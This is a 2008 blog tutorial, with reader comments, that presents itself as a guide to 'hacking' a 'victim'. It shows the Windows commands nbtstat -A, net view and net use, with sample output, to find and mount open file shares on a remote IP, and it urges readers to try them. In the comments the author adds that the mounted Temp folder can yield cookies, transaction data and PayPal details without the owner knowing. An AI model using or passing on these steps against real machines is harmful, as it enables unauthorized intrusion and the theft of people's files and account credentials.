Categorized | Security, Tutorial

The art of HACKING!!… Ain’t that tough really!

Posted on 21 August 2008

It’s a common perception that hacking is a very tedious and time consuming process involving loads of complications, however it isn’t so! All it takes is SOLID brain, a vulnerable system than can be hacked and just a few seconds!! Discover the process…

As usual start the proceedings in the following manner-


Click “Start -> Run -> cmd

At Dos Prompt ->

Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]

This will give you a read out that looks like this->

NetBIOS Remote Machine Name Table

The following is an example-

Name Type Status

————————————-
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__ <01> GROUP Registered
———————————————–

The numbers in the <> are hex code values. What we are interested in is the “Hex Code” number with <20>.

A hex code of <20> means you have file and printer sharing turned on!

Next step is to find out what is being shared->

Net view \\
[e.g : net view \\207.175.1.1]

You will then get a response that looks similar to this->

Shared resources at \\ip_address
Sharename Type Comment


______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)

This indicates that you have gained access to your potential victim’s My Documents Folder as well as their Temp directory.

To get access to those folders next command ->

Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]

If all goes well for you, you will then get a response of
(The command was completed successfully.)

That’s it!! You are all set to HACK the victim’s Temp folder!!

Go try it out :)

1 Star2 Stars3 Stars4 Stars5 Stars (8 votes, average: 4.88 out of 5)
Loading ... Loading ...

This post was authored by:

om - who has written 101 posts on Tech Pedia.

Om is a freelance writer cum software engineer! Works for a reputed IT company & provides freelancing writing & web-services to several clients in US, Europe, Asia and all over the world! Owns a website,blog &runs a private franchise business whose clients are in fortune 100 listing! For relevant work contact him to om.thoke86@gmail.com

Contact the author

2 Comments For This Post

  1. mike says:

    This is not hacking, this is accessing windows shares. Please stop making a fool of yourself with this garbage.

  2. om says:

    Well as a matter of fact you are indeed correct! It is windows sharing after all but, you can of course access what you want to… And there are high chances that the other person wouldn’t be aware of it!! Had professional hacking been so easily, then by now some one would have already hacked your PC totally!!

    Even there are other similar things that can be regarded as windows sharing itself, but people use it to gain access to privileged documents of the other persons like online transactions and cookies that gets saved on the temp folder!

    So there’s a possibility of accessing precious details like paypal account or other stuff while a person is online & isn’t aware of the fact that you are using that info… So it can be called HACKING in a vague sense… I am not claiming that it is real hacking, but can serve a similar purpose undoubtedly.. :)

Leave a Reply

Site Sponsors

  • programming freak: And by the way thanks for those useful codes, i am surprised a site like this has C codes? and...
  • programming freak: Keep posting some codes man, i would be glad to find some c/c++/java/html/unix codes, sql queries...
  • programming freak: Hey thanks, good one!
  • Nathaniel Baker: its all good information.. but you forgot one very very important thing…. FAT32 can not...
  • om: Yeah sure it is.. :)

Older Posts

Ads

  • Advertise Here

Topics